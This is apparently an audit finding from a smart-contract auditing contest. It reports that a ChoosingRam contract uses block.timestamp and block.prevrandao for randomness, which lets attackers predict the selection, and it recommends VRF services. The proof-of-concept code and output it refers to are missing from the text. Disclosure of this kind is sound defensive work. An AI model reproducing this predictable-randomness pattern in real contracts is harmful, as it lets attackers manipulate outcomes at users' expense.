The selectRamIfNotSelected()
function in the ChoosingRam contract uses a logic that relies on block.timestamp
and block.prevrandao
to select a random RAM. However, this approach makes the randomness predictable, especially on certain blockchains where block.prevrandao
returns constant values, such as Arbitrum and zkSync. This predictability compromises the security and integrity of the selection process.
Predictable randomness allows attackers to predict the selected RAM, breaking the randomness logic and potentially manipulating the outcome. This vulnerability can lead to unfair advantages and exploitation within the system.
Run the following code in Dussehra.t.sol
:
Output :
To ensure the randomness cannot be predicted or manipulated, use a Verifiable Random Function (VRF) service. VRF services provide secure and verifiable random numbers that are resistant to prediction and manipulation attacks. Some recommended services include:
Chainlink VRF (Recommended): Provides cryptographically secure randomness.
Gelato: Offers automation and randomness services.
Pyth: Delivers reliable and tamper-proof random numbers. By integrating one of these VRF services, the randomness logic in selectRamIfNotSelected() will be significantly more secure, preventing the vulnerabilities associated with the current implementation.
The contest is live. Earn rewards by submitting a finding.
This is your time to appeal against judgements on your submissions.
Appeals are being carefully reviewed by our judges.